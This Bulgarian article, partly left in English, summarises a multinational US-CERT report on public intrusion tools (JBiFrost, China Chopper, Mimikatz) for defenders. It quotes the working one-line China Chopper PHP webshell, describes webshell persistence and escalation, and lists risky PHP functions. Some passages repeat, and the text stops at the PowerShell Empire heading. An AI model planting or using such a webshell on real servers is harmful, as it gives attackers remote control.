US-CERT издаде доклад с описание на основни публично достъпни инструменти за кибернашествия

Докладът съдържа съвместно изследване от институциите за киберсигурност на пет държави: Австралия, Канада, Нова зенландия, UK и USA. [1][2][3][4][5]

Съдържанието му представя пет публично достъпни инструменти за кибернашествия, които се използват за зловредни действие при кибер инциденти в последните години:

  1. Remote Access Trojan: JBiFrost
  2. Webshell: China Chopper
  3. Credential Stealer: Mimikatz
  4. Lateral Movement Framework: PowerShell Empire
  5. C2 Obfuscation and Exfiltration: HUC Packet Transmitter

Целта на доклада е да подпомогне работата на екипите, които конструират защитата на мрежите и информационните системи. Предоставя и съвети за ограничаване на ефективността на тези Публично достъпни инструменти за кибернашествия и откриване на тяхното присъствие в мрежите.

Инструментите, които са анализирани в този доклад, са много малка част от огромния парк с различни други инструменти, използвани от злонамерените актьори на заплахите.

Тази уговорка е важна, за да не смятат засегнатите от подобни рискове, че с този списък се изчерпват планираните мерки за защитата на мрежата.

Публично достъпни инструменти за кибернашествия и техниките, които са предназначени за експлоатиране на мрежите и данните, които се съхраняват в тях, днес са достъпни за всички, които имат умението да си копират няколко файла от интернет и да боравят с тях в ролята на хакери. Независимо дали придобилите тези инструменти са представители на институции или престъпници, те могат да изпълзват пълната им функционалност без да притежават изключителни занания, умения и компетенции, каквито са имали хакерите създатели на тези инструменти. Предварителната подготовка за боравене с тези инструменти днес е тази, с която разполагат редовите потребители от цифровия свят.

Осигурени с разнообразни функции зловредните Публично достъпни инструменти за кибернашествия може да бъдат използвани от всички

  • квалифицирани тестери за проникване;
  • враждебни държавни актьори;
  • организирани престъпници;
  • самосиндикални кибер престъпници;
  • любители хакери.

Инструментите, които са анализирани в този документ, са използвани за компрометиране на мрежи и информационни системи в широк спектър от критични сектори, включително здравеопазване, финанси, правителство и отбрана. Широкото им разпространение представлява предизвикателство за защитата на мрежите и противопоставянето на актьорите на заплахите.

Какво показва опитът от представяното проучване. То е направено чрез обединие на капацитета на водещи световни икономически и технологични сили на страните участнички.

Въпреки че участниците в кибернетичната заплаха продължават да развиват своите възможности, те все още използват въпросните инструменти и техники.

Дори най-сложните атаки на групи участници в заплахите използват общи, публично достъпни инструменти за постигане на техните цели

Каквито и да са тези цели, първоначалното проникване в системите на жертвите често става чрез използване на общи слабости в сигурността. Злоупотребата с незакърпени софтуерни уязвимости или с лошо конфигурирани системи са често срещани подходи на актьорите на заплахите. Инструментите, описани подробно в този доклад влизат в действие  след като бъде компрометирана мрежата или информационната система. Това позволява на атакуващите да постигнат целите си в системите на жертвата. Целите обикновено с аизточване на лични данни, на корпоративно ноу-хау. По рядко се стига до унищожаване на дданни или цели системи.

Независимо от целите на атакуващите, инициализацията н аатаката най-редовно става през добре познати и известни уязвимости в операционните системи, машините за обработване на бази данни, мрежовите устройства и приложенията.

Как се използва доклада на US-CERT за Публично достъпни инструменти за кибернашествия

Инструментите, които се обсъждат в доклада попадат в пет различни категории.

Remote Access Trojans (RATs);

webshells;

credential stealers;

lateral movement frameworks;

and command and control (C2) obfuscators.

Представен е преглед на заплахите, които всеки от инструментите предполага. Припомнят се реални инциденти с вътрешни подробности кога, къде и по какъв начин е овеществена заплахата с всеки от инструментите. Дава отговор как да се подходи за откриване на итструмента, след като е инсталиран в компрометирана система и възможностите му за нанасяне на ефективни вреди. Представени са и мерки за повишаване на защитните възможности на мрежите на базата на добри практики.

Технически детайли

Remote Access Trojan: JBiFrost

За първи път е наблюдаван през май 2015 г. JBiFrost RAT е вариант на RAT, който от своя страна произлица или е модификация на Frutas RAT 2012.

RAT е програма, която след като бъде инсталирана на машината на жертвата дава възможност за отдалечено администриране.  Списъкът на услугите, които злосторниците получават след скритото инсталиране на такъв тип програма включва:

отдалечено конфигуриране и преконфигуриране на операционната система и проложенията;

инсталиране, активиране и спиране, както и деинсталиране на програми за

  • записване през микрофона на машината;
  • филмиране през камерата;
  • записване на всички натиснати клавиши – чрез keylogger;
  • копиране на данни;
  • изпращане на снимки на екрана към отдалечени машини или имейл адреси дори.

Зловредните RAT са трудни за откриване. Създателите им са ги направили невидими. Те не излизат в списъка на активните приложения, които се листват когата ги гледаме през Task Manager във Windows или Application Manager в Android..

За да предотвратят откриването си RAT изключват мерките за сигурност в операционните системи.

Начин на употреба

JBiFrost RAT се използва от кибер криминали и други актьори на заплахите, които имат слаба подготовка в областта на хакерството. Възможностите на ези инструменти лесно воже да влязат в работа и на институционално организирани актьори на заплахите.

Други, по-рафинирани RAT се използват за реализиране на постоянно невидимо присъствие (Advanced Persistent Threat, APT)) в мрежите и информационните системи на жертвите. Такива са примерите с:

  • Adwind RAT, използван срещу структури от въздухоплаването и отбраната;
  • Quasar RAT, by APT10, срещу организации от широк спектър от индустриални сектори.

Целта на инструментите за постоянно невидимо присъствие обикновено е постоянно изнасяне на ценна информация, например пълномощия за банкови акаунти, индустриално ноухау или лични данни.

Възможности

JBiFrost RAT е базиран на Java, кросплатформен и мултифункционален. Заплашва Windows, Linux, MAC OS X и Android.

JBiFrost RAT позволява на актьорите на заплаха да да се придвижват между хостовете като завладяват нови територии от мрежата или да инсталират допълнителен злонамерен софтуер. Той се предава основно чрез:

  • имейли;
  • прикачен файл;
  • обикновено известие за фактура;
  • заявка за котировка;
  • уведомление за превод;
  • уведомление за изпращане;
  • известие за плащане;
  • или с връзка към услуга за хостване на файлове.

Но това още не е всичко

Както се казва в рекламата. След като веднъж завладяната територия е употребена и инфекциите са извлекли интелектуална собственост, банкови данни и лична идентификационна информация (PII) следва втори начин на употреба. Машините, заразени с JBiFrost RAT, могат да се използват и в ботнетите за извършване на разпределени атаки на отказ от обслужване DDoS.

Примери за атаки с Публично достъпни инструменти за кибернашествия

В началото на 2018 се наблюдава нарастване на използването на JBiFrost RAT в атаки срещу организации, които имат за предмет критична национална инфраструктура в САЩ и операторите от техните вериги за доставки.

През 2017, Adwind RAT е инсталиран в широк  спектъп платформи през лъжливи имейли. За целта имейлите са изглеждали създадени и изпратени от Society for Worldwide Interbank Financial Telecommunication, SWIFT, организация, която предлага специализирани мрежови услуги за финансови институции.

Много други версии на различни RAT, включително варианти на Gh0st RAT, са наблюдавани срущу голямо количество цели по света.

Откриване и защита на Публично достъпни инструменти за кибернашествия

Някои от индикациите за наличие на инфекция с JBiFrost RAT:

Невъзможност за рестартиране на компютъра в безопасен режим Safe mode;
Невъзможността за отваряне на редактора на системния регистър на Windows или на диспечера на задачите Task manager;
Значително увеличаване на дисковата активност или мрежовия трафик;
Наблюдават се опити за свързване със злонамерени IP адреси по различни протоколи;
Създаване на нови файлове и директории с мъгливи, странни  случайни имена.
Защитата се осигурява най-добре, като се гарантира, че системите и инсталираните приложения са напълно защитени чрез подходящи конфигурации и актуализирани с ъпдейти по сигурността. Използването на съвременна антивирусна програма с автоматично актуализиране на дефинициите и редовни системни сканирания също ще помогне да се гарантира, че повечето от най-новите варианти на RAT ще бъдат спрени.

За да се предотврати появата на инфекции, се препоръчва стриктно включване на механизма бял списък

Той съдържа имената на приложенията, за които е разрашено да работят в платформата.

Първоначалният механизъм за инфектиране за RAT, включително JBiFrost RAT, може да бъде чрез фишинг имейли. Можете да предотвратите появата на инфекции, причинени от JBiFrost RAT, като престанете да достигате до потребителите си, като помагате на потребителите да идентифицират и докладват имейли за фишинг и да въвеждат контроли за сигурност, така че зловредният имейл да не компрометира вашето устройство. Националният център за кибернетична сигурност в Обединеното кралство (United Kingdom National Cyber Security Centre, UK NCSC) публикува насоки за фишинг.

Webshell: Китайски хеликоптер
Китайски хеликоптер е публично достъпен уебшел. Добре документиран, широко използван от 2012 г. насам.

Webshells са злонамерени скриптове, които се качват в целеви хост след първоначален компромис и предоставят на отдалечен административен капацитет за осъществяване на атака и реализиране на заплаха.

След като този достъп бъде установен, webshells могат да бъдат използвани за овладяване на следващи хостове в рамките на мрежата.

Webshell: China Chopper

China Chopper е публично достъпен, добре документиран webshell. Разпространен е широко от 2012 г.

Зловредните софтуерни приложения от типа Webshell се копират чрез непозволени способи в платформата, която е цел на атаката. След този момент хостът е компрометиран. Тогава злонамерения актьор има възможност да упражнява права на администратор върху ресурсите му. Най неприятната вест в този случай е възможността на злонамерените актьори да използват този хост за плацдарм. За да окупират останалите платформи от мрежата, в която са попаднали. От гледна точка на крайния потребител China Chopper е приложение с графичен интерфейс и менюта. Заедно с приличната документация това го прави достъпен дори за неизкушени потребители, камо ли за хакери.

Употреба на Публично достъпни инструменти за кибернашествия

China Chopper се използва интензивно от актьорите на заплахите за отдалечен достъп до овладени компютри с компрометирани уеб сървъри. Така зломишлениците могат да управляват файлове и директории, имат достъп до платформата чрез виртуален терминал.

Големината на China Chopper е само 4 KB и лесно се използва за да пренася товари, трудно се открива поради големината на файла и не е лесен за деактивиране.

Какви може да бъдат товарите? Най често зловредни приложения, които се инсталират с помощта на webshell. Може да са:

  • агенти за причиняване на отказ на услуга;
  • разппространяване на софтуер за добиване на биткоини без знанието на потребителя;
  • приложения за ransomware, които криптират данните и издават съобщение с искане за откуп и много други.
Възможности на China Chopper

В генеричния и този случай webshell се състоят от две части – клиент с графичен интерфейс (caidao.exe) и малко парче код върху компрометирания уеб сървър.

Опасен е защото е труден за откриване

Файлът, който се поставя в копрометирания уеб сървър в някои случаи с PHP е следния.

<?php @eval($_POST[‘password’]);?>

Логиката за функционирането му е делегирана на клиента caidao.exe.

Той комуникира директно с файла, който е поставен в уеб сървъра и доставя множество интересни възможности например:

  • File explorer;
  • DataBase client;
  • interactive command shell;
  • “Security Scan” полезен при брутално тестване за откриване н апароли за досъп до уеб портали.

Хешът на клиента по MD5 е публично достъпен (оригинално публикуван на hxxp://www.maicaidao.com).

Table 1: China Chopper webshell client MD5 hash

Webshell ClientMD5 Hash
caidao.exe5001ef50c7e869253a7c152a638eab8a

Сървърът на webshell (малкото парче код на PHP) се копира в компрометирания уеб сървър. След това може лесно да бъде променян от атакуващия. Това усложнява дефинирането на специфичен хеш, който всеки път да помага в откриването на зловредна активност с този инструент.

През лятото на 2018 г. актьорите на заплахите се насочват към уеб сървъри, които са уязвими за CVE-2017-3066. Активността им е свързана с уязвимост в платформата за разработване на уеб приложения Adobe ColdFusion. Тя дава възможност за отдалечено изпълнение н апрограмен код (remote code execution).

China Chopper е предназначен за второстепенен полезен товар, доставен, след като сървърите вече са били компрометирани.  Позволява на актьора на заплахата отдалечен достъп до хоста на жертвата. След успешното използване на уязвимост на машината на жертвата, стрингът с China Chopper се доставя в директориите на уеб сървъра. След като бъде копиран там, сървърът на WebShell може да бъде достъпен от актьорите на заплахата по всяко време чрез използване на клиентското приложение. След успешното свързване, атакуващият  продължава да манипулира файлове и данни на уеб сървъра, естествено в свой интерес.

Възможностите на China Chopper включват:

  • копиране на файлове от и към жертвата чрез инструмента wget;
  • за копиране на файлове от интернет към целта;
  • редактиране, изтриване, копиране, преименуване и дори промяна на времевите маркери на съществуващи файлове.
Откриване и защита

За да бъдат открити webshells навреме, защитата сайта трябва да се съсредоточи върху откриването на подозрителни процеси в уеб сървъра. Например активиране на процеси, които се инициализират с функции от препроцесора за хепертекст, най често PHP. (Hypertext Preprocessor [PHP]) и изходящите мрежови връзки от уеб сървъри. Обикновено уеб сървърите допускат  предвидими връзки към вътрешна мрежа. Промените в тези модели може да показват наличието на използвене на webshell. Чрез управление на пълномощията се забранява на процесите в уеб сървърите да записват файлове в директории, в които може да се изпълнява програмен код на PHP или да се променят съществуващи файлове.

Професионалният подход изисква използване на регистрационни файлове за достъпа до уеб сайта (журнали, тоест syslog). Те са източник за мониторинг, анализиране на трафика, откриване на промени в уеб страниците или аномалии в трафика. Да речем че те са перфектни ранни индикатори.

Най-мощната защита срещу webshell е да се избегне компрометирането на уеб сървъра на първо място. Най-напред е необходимо всички софтуерни артефакти, които работят в инфраструктурата на сайта:

  • уеб сървър;
  • машини за бази данни;
  • интерпретатори на езици запрограмиране;
  • библиотеки с програмен код;
  • проксита;
  • са актуализирани с последните си поправки по сигурността.

Следващата стъпка, която е необходимо да се следва е

Одит на персонализирани приложения за често срещани уеб уязвимости [6].

Характерен атрибут на China Chopper е голямото количество обръщения към сайта такива, че всяко действие генерира протокол за пренос на хипертекст (HTTP) POST. Това е трафична аномалия и аномалия в поведението на крайния потребител. Тя лесно се забелязва и регистрира при мониторинг на журналите (syslog). Стига да  бъдат проучени с автоватизирани инсрументи или ръчно от защитник на мрежата.

Копирането на WebShell, в случая анализирания China Chopper става с прехвърляне през мрежата на обикновен текст. Командите, издадени от клиента, са кодирани с Base64, въпреки че това е лесно за декодиране. Приемането и разпространяването на TLS (Security Layer Security) от уеб сървърите доведе до криптиране на трафика в уеб сървърите. Това прави разкриването на дейността на China Chopper с използване на мрежови инструменти по-трудно.

Най-ефективният начин за откриване и смекчаване на Китайския хеликоптер (China Chopper) е да се подходи откъм самия хост, където домува уеб сървъра. Съществуват лесни начини за търсене на присъствието на уеб шела (China Chopper) като се използва командния ред на операционните системи Linux и Windows. [7]

За да се се осигури защита на уеб сайтовете от този клас посегателство,

защитниците на мрежата трябва да се съсредоточат върху откриването на подозрително изпълнение на уеб сървъри (напр. Процеси на възникване на хакери на Hypertext Preprocessor [PHP]) и извънходящи мрежови връзки от уеб сървъри. Обикновено уеб сървърите правят предвидими връзки към вътрешна мрежа. Промените в тези модели може да показват наличието на уеб черупка. Можете да управлявате разрешенията на мрежата, за да не позволите на процесите в уеб сървърите да пишат в директории, в които може да се изпълнява PHP или да променят съществуващи файлове.

Също така ви препоръчваме да използвате регистрационни файлове за уеб достъп като източник на мониторинг, като например чрез трафик анализи. Неочакваните страници или промените в трафика могат да бъдат ранни индикатори.

Блокиране на Webshell

Експлоита webshell се използва само на сървъри с уязвимости на уеб приложения или слобости в конфигурационните параметри на уеб сървъра. Идентифицирането и закриването на такива уязвимости е от решаващо значение за избягване на компрометирането на сайта. За сървъри, поддържащи PHP, потенциално опасни функции са exec (), shell_exec (), eval (), assert () и т.н. Те трябва да бъдат забранени в php.ini. Това прави трудно изпълнението на скрипта от webhell. Дори и да бъде копиран в директориите на уеб сървъра, при тази забрана няма как да бъде активиран. Също така чувствителните директории, като например тези с графика или допускащи копиране (upload),  трябва да бъдат деактивирани или имената им да бъдат променени от състоянието им по подразбиране. Уеб приложенията с функции за качване (upload) на файлове трябва да бъдат защитени и да позволяват качването на файлове само от бял списък. В случай на CMS, като WordPress, плъгини от трети страни, които не са необходими, трябва да бъдат деактивирани.

Ютилизиране на WEBSHELL

Продължителен отдалечен достъп

WEBSHELL обикновено съдържа задна вратичка, която позволява на атакуващия да получава отдалечен достъп и евентуално да управлява услуги в собствен интерес, по същество сървър намиращ се в същия сървър, по всяко време. Това спестява на атакуващия неудобството, че трябва да използва уязвимост всеки път, когато се изисква достъп до компрометирания сървър.

Нападателят може също така да реши да преустанови самата уязвимост, за да се гарантира, че никой друг няма да я използва. По този начин нападателят може да стане още по-незабележим и да избегне разкриване, а получава същия резултат.

Заслужава да се отбележи също така, че няколко популярни модела на webshell използват удостоверяване чрез представяне н апълномощия – пароли и други техники, за да се гарантира, че само хакерът, който го управлява, има достъп до него. Такива техники включват заключване на скрипта на специфичен персонализиран HTTP хедър, специфични стойности на “бисквитки”, специфични IP адреси или комбинация от тези техники. Повечето webshel съдържат и код за идентифициране и блокиране на търсещите машини от заложен в тях списък, а заедно с това и черен списък на домейна или сървъра, на който се хоства уеб приложението. Така ключалката е неоткриваема и достъпна дори за домакините.

Ескалиране на привилегиите

Освен ако сървърът не е конфигуриран погрешно, webshell ще работи с правата за достъп на потребителя, от името на който е активиран уеб сървъра. Последните са, или поне трябва да бъдат ограничени. Използвайки webshell нападателят може да се опита да извърши атаки за ескалация на привилегии, като използва локалните уязвимости в системата, за да овладее праната на супер потребител (root) в Linux и други операционни системи, базирани на UNIX.

С достъп до коренния акаунт (root) нападателят може по същество да направи каквото си поиска в операционната система. Включително инсталиране на софтуер, промяна на разрешения, добавяне и премахване на потребители, кражба на пароли, четене на имейли и др.

Разширяване на успеха и инициализиране на нови атаки

webshell може да се използва за проучване и превземане на останалите системи вътре или извън корпоративната мрежа. Нападателят може да иска да трасира и проверява мрежовия трафик като сканира вътрешната мрежа, за да открива живи хостове и да регистрира и оцени защитните стени и маршрутизаторите в мрежата.

Този процес може да отнеме дни, дори месеци, предимно защото нападателят обикновено се стреми да поддържа невидим, прозрачен за защитниците профил и да привлече възможно най-малко внимание. След като нападателят има постоянен достъп, той може търпеливо да направи следващите си ходове.

Компрометираната система може да се използва и за атака или сканиране на цели, разположени извън мрежата. Това добавя допълнителен слой “анонимност” към нападателя, тъй като използва система от трета страна, за да започне атака. Една стъпка напред би била да се конструира “тунел” през множество системи, за да стане почти невъзможно да се проследи атаката обратно към нейния източник.

Забележително е, че когато има пълни права, такъв нападател има условия да прикрива следите си.

Zombie

Another use of web-shells is to make servers part of a botnet. A botnet is a network of compromised systems that an attacker would control, either to use themselves, or to lease to other criminals. The web-shell or backdoor is connected to a command and control (C&C) server from which it can take commands on what instructions to execute.

This setup is commonly used in distributed-denial-of-service (DDoS) attacks, which require expansive amounts of bandwidth. In this case, the attacker does not have any interest in harming, or stealing anything off-of the system upon which the web shell was deployed. Instead, they will simply use its resources for whenever is needed.

Друга употреба на web-shells е за създаване на сървърите, чрез които се управлява ботнет. Ботнетът е мрежа от компрометирани системи, които един нападател би могъл да

контролира;

използва за собствени целии;

или да отдаде под наем на други престъпници.

Уеб-обвивката (webshell) или задната вратичка се свързва със сървър за контрол и управление (C&C), от който може да приема команди от оператора си и да изпълнява инструкции върху хиляди машини, чрез webshell.

Тази настройка обикновено се използва в атаки от типа разпределен отказ на услуга (DDoS), които изискват широки честотни ленти. В този случай, нападателят няма за цел да навреди или да открадне нещо от системата, върху която е разположен webshell. Вместо това нападателят използва ресурсите му за обмен по мрежовите интерфейси за да изпрати некоректно количество заявки към отдалечен хост, когато е необходимо.

Кражба ва потребителски акаунти с Mimikatz

Mimikatz е разработена през 2007 г.. Използва се от зломишлени актьори за събиране на пълномощията (потребителските имена и паролите) на други потребители, които са влезли в целевата машина с Windows. Това става чрез достъп до идентификационните данни в паметта в рамките на процеса на Windows, наречен Local Security Authority Subsystem Service (LSASS).

Тези идентификационни данни, както в обикновен текст, така и в хеширана форма, могат да бъдат използвани отново, за да се осигури достъп до други машини в мрежата.

Въпреки че първоначално не е бил предназначен като хакерски инструмент, през последните години Mimikatz е бил използван от множество актьори за злонамерени цели. Използването му в от хакери за различни атаки по света постави пред организициите в световен мащаб да задача да преосмислят своите мрежови защити.

Mimikatz обикновено се използва от актьорите на заплаха, след като достъпът до хост от вътрешната мрежа е постигнат и нашественикът иска да се движи във вътрешната мрежа. Неговото използване може значително да подкопае лошо конфигурирана мрежова сигурност.

Начин на употребе

Програмния код на Mimikatz е публично достъпен. Това означава, че всеки може да го вземе и да го промени. За да компилира своя собствена версия или да създаде разширение (plug-in) с добавена нова функционалност.

Our cyber authorities have observed widespread use of Mimikatz among threat actors, including organized crime and state-sponsored groups.

Once a threat actor has gained local administrator privileges on a host, Mimikatz provides the ability to obtain the hashes and clear-text credentials of other users, enabling the threat actor to escalate privileges within a domain and perform many other post-exploitation and lateral movement tasks.

For this reason, Mimikatz has been bundled into other penetration testing and exploitation suites, such as PowerShell Empire and Metasploit.

Capabilities

Mimikatz is best known for its ability to retrieve clear text credentials and hashes from memory, but its full suite of capabilities is extensive.

The tool can obtain Local Area Network Manager and NT LAN Manager hashes, certificates, and long-term keys on Windows XP (2003) through Windows 8.1 (2012r2). In addition, it can perform pass-the-hash or pass-the-ticket tasks and build Kerberos “golden tickets.”

Many features of Mimikatz can be automated with scripts, such as PowerShell, allowing a threat actor to rapidly exploit and traverse a compromised network. Furthermore, when operating in memory through the freely available “Invoke-Mimikatz” PowerShell script, Mimikatz activity is very difficult to isolate and identify.

Examples

Mimikatz has been used across multiple incidents by a broad range of threat actors for several years. In 2011, it was used by unknown threat actors to obtain administrator credentials from the Dutch certificate authority, DigiNotar. The rapid loss of trust in DigiNotar led to the company filing for bankruptcy within a month of this compromise.

More recently, Mimikatz was used in conjunction with other malicious tools—in the NotPetya and BadRabbit ransomware attacks in 2017 to extract administrator credentials held on thousands of computers. These credentials were used to facilitate lateral movement and enabled the ransomware to propagate throughout networks, encrypting the hard drives of numerous systems where these credentials were valid.

In addition, a Microsoft research team identified use of Mimikatz during a sophisticated cyberattack targeting several high-profile technology and financial organizations. In combination with several other tools and exploited vulnerabilities, Mimikatz was used to dump and likely reuse system hashes.

Detection and Protection

Updating Windows will help reduce the information available to a threat actor from the Mimikatz tool, as Microsoft seeks to improve the protection offered in each new Windows version.

To prevent Mimikatz credential retrieval, network defenders should disable the storage of clear text passwords in LSASS memory. This is default behavior for Windows 8.1/Server 2012 R2 and later, but can be specified on older systems which have the relevant security patches installed.[8] Windows 10 and Windows Server 2016 systems can be protected by using newer security features, such as Credential Guard.

Credential Guard will be enabled by default if:

  • The hardware meets Microsoft’s Windows Hardware Compatibility Program Specifications and Policies for Windows Server 2016 and Windows Server Semi-Annual Branch; and
  • The server is not acting as a Domain Controller.

You should verify that your physical and virtualized servers meet Microsoft’s minimum requirements for each release of Windows 10 and Windows Server.

Password reuse across accounts, particularly administrator accounts, makes pass-the-hash attacks far simpler. You should set user policies within your organization that discourage password reuse, even across common level accounts on a network. The freely available Local Administrator Password Solution from Microsoft can allow easy management of local administrator passwords, preventing the need to set and store passwords manually.

Network administrators should monitor and respond to unusual or unauthorized account creation or authentication to prevent Kerberos ticket exploitation, or network persistence and lateral movement. For Windows, tools such as Microsoft Advanced Threat Analytics and Azure Advanced Threat Protection can help with this.

Network administrators should ensure that systems are patched and up-to-date. Numerous Mimikatz features are mitigated or significantly restricted by the latest system versions and updates. But no update is a perfect fix, as Mimikatz is continually evolving and new third-party modules are often developed.

Most up-to-date antivirus tools will detect and isolate non-customized Mimikatz use and should therefore be used to detect these instances. But threat actors can sometimes circumvent antivirus systems by running Mimikatz in memory, or by slightly modifying the original code of the tool. Wherever Mimikatz is detected, you should perform a rigorous investigation, as it almost certainly indicates a threat actor is actively present in the network, rather than an automated process at work.

Several of Mimikatz’s features rely on exploitation of administrator accounts. Therefore, you should ensure that administrator accounts are issued on an as-required basis only. Where administrative access is required, you should apply privileged access management principles.

Since Mimikatz can only capture the accounts of those users logged into a compromised machine, privileged users (e.g., domain administrators) should avoid logging into machines with their privileged credentials. Detailed information on securing Active Directory is available from Microsoft.[9]

Network defenders should audit the use of scripts, particularly PowerShell, and inspect logs to identify anomalies. This will aid in identifying Mimikatz or pass-the-hash abuse, as well as in providing some mitigation against attempts to bypass detection software.

Lateral Movement Framework: PowerShell Empire

Hits: 22